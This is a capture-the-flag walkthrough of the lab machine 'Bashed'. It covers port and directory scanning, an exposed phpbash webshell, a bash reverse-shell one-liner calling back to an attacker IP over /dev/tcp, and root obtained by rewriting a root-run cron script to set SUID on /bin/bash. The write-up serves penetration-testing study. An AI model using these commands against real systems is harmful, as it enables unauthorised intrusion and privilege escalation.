Bashed

Enumeration
As usual, we start with an nmap scan to find open ports on the target machine.
The following command scans the full port range quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.68 -oN allPorts
-sS: TCP SYN ("half-open") scan. It never completes the TCP handshake, so the application behind the port usually does not log it, although at --min-rate 5000 and -T5 the scan is anything but quiet on the network.
--min-rate 5000: nmap tries to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, 1 to 65535.
-T5: the "insane" timing template, the fastest one nmap offers. It can miss ports on slow or lossy links; note the retransmission-cap warning in the output below.
-Pn: skip host discovery and assume the host is up.
-n: no reverse DNS resolution.
-oN: save the output in normal format, here to the file allPorts.
# Nmap 7.92 scan initiated Mon Mar 7 21:31:10 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.68
Warning: 10.10.10.68 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.68
Host is up (0.065s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
# Nmap done at Mon Mar 7 21:31:26 2022 -- 1 IP address (1 host up) scanned in 16.14 seconds
As we see, only port 80 (HTTP) is open. Let's try to obtain more information about the service and version running on that port.
nmap -sC -sV -p80 10.10.10.68 -oN targeted
-sC: run the default set of NSE scripts.
-sV: enable service and version detection.
-oN: save the output in normal format, here to the file targeted.
# Nmap 7.92 scan initiated Mon Mar 7 21:32:12 2022 as: nmap -sCV -p80 -oN targeted 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 7 21:32:21 2022 -- 1 IP address (1 host up) scanned in 8.98 seconds
Let's take a look at the website.

There isn't much going on. Let's enumerate directories with gobuster.
gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
dir: directory and file enumeration mode.
-u: the target URL.
-w: path to the wordlist.
-t: number of concurrent threads, here 200.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.68
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/07 21:44:27 Starting gobuster in directory enumeration mode
===============================================================
/php (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]
/css (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/js (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]
/fonts (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
/images (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/server-status (Status: 403) [Size: 299]
===============================================================
2022/03/07 21:46:17 Finished
===============================================================
Exploitation
If we take a look at the /dev directory, we find a few PHP files.

Clicking phpbash.php opens a webshell: anything typed into it runs on the server as the web server user.

Let's upgrade that to a reverse shell. First, start a netcat listener on port 4444.
nc -lvnp 4444
-l: listen mode.
-v: verbose output.
-n: numeric-only addresses, no DNS resolution.
-p: the local port to listen on.
Then, from the webshell, run the following one-liner. It points at the listener started above (attacker IP 10.10.14.11, port 4444, as the incoming connection below confirms). The & characters are written as %26 because the command travels inside an HTTP request, where a bare & would be parsed as a parameter separator and the server would receive a truncated command.
bash -c "bash -i >%26 /dev/tcp/10.10.14.11/4444 0>%261"
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.68] 39324
bash: cannot set terminal process group (762): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3$ whoami
whoami
www-data
bash-4.3$ cat /home/arrexel/user.txt
cat /home/arrexel/user.txt
2c281f318555dbc1b856957c7147bfc1
Privilege Escalation
Let's start the privilege escalation phase by listing the sudo privileges of the www-data user.
sudo -l
-l: list the invoking user's sudo privileges.
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
We can run any command as the scriptmanager user without a password. Let's get a shell as scriptmanager.
sudo -u scriptmanager bash
bash-4.3$ whoami
whoami
scriptmanager
If we look for files owned by scriptmanager, we find test.py in the /scripts directory, and next to it a file owned by root:
ls -l /scripts
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 43 Mar 7 13:49 test.py
-rw-r--r-- 1 root root 12 Mar 7 13:48 test.txt
Let's see the content of test.py and test.txt:
cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
cat /scripts/test.txt
testing 123!
test.txt is owned by root yet contains exactly what test.py writes, so something running as root, presumably a scheduled task, executes the script. test.py opens test.txt with a relative path and the file lands in /scripts, so the job runs with /scripts as its working directory. Since test.py is owned, and therefore writable, by scriptmanager, the idea is to replace it with a script that sets the SUID bit on /bin/bash; the next time root's job runs it, bash becomes a setuid-root binary.
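Before overwriting the script it is worth confirming the scheduled-task hypothesis rather than guessing. The snippet below is an added example, not part of the original write-up: it parses system-crontab text (the format of /etc/crontab and /etc/cron.d/*, with a user field before the command) and reports root's jobs whose script the current user can overwrite. The crontab content it runs on is a constructed sample, not what the target actually contains.

```shell
#!/bin/sh
# Added example (not from the original write-up): confirm the "root runs a
# scheduled task" hypothesis by parsing system-crontab text (the format of
# /etc/crontab and /etc/cron.d/*: m h dom mon dow user command) and reporting
# root's jobs whose script the current user can overwrite.

# Print "<user> <command>" for every active job read from stdin. Handles
# comments, blank lines, VAR=value assignments and @reboot/@daily shorthands.
cron_jobs() {
    awk '
        NF == 0 || $1 ~ /^#/ { next }
        $1 ~ /^[A-Za-z_][A-Za-z0-9_]*=/ { next }
        {
            if ($1 ~ /^@/) { user = $2; first = 3 } else { user = $6; first = 7 }
            cmd = ""
            for (i = first; i <= NF; i++) cmd = cmd (i > first ? " " : "") $i
            print user " " cmd
        }'
}

# From "<user> <command>" lines, keep root's jobs and print the first absolute
# path in the command that is a regular file writable by the current user.
# Checking every word catches "python /scripts/test.py" as well as a bare
# script path.
root_writable_scripts() {
    while read -r user cmd; do
        [ "$user" = root ] || continue
        set -f    # no glob expansion while splitting the command into words
        for word in $cmd; do
            case "$word" in
                /*) if [ -f "$word" ] && [ -w "$word" ]; then
                        printf '%s\n' "$word"
                        break
                    fi ;;
            esac
        done
        set +f
    done
}

# Constructed sample in /etc/crontab format (not taken from the target).
SAMPLE_CRONTAB='# m h dom mon dow user command
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root cd /scripts && python test.py
*/5 * * * * www-data /usr/bin/true
@reboot root /usr/local/bin/boot-hook.sh'

# On a real host:
#   cat /etc/crontab /etc/cron.d/* 2>/dev/null | cron_jobs | root_writable_scripts
printf '%s\n' "$SAMPLE_CRONTAB" | cron_jobs
```

Root's personal crontab (/var/spool/cron/crontabs/root) is not readable by other users, so an empty result does not rule out a job; in that case the fallback evidence is simply watching whether /scripts/test.txt keeps being rewritten. With the job confirmed, the script can be replaced: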
nano /scripts/test.py
import os
os.system("chmod +s /bin/bash")
Now all we have to do is wait for the job to fire and check that /bin/bash has gained the SUID bit (the s in the owner's execute position):
ls -l /bin/bash
-rwsr-sr-x 1 root root 1037528 Jun 24 2016 /bin/bash
Finally, run bash with -p. When bash starts with an effective UID different from its real UID it drops the privileges unless -p (privileged mode) is given, so without the flag we would simply be scriptmanager again. With -p the effective UID stays 0 and we can read the root flag.
bash -p
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt
cc4f0afe3a1026d402ba10329674a8e2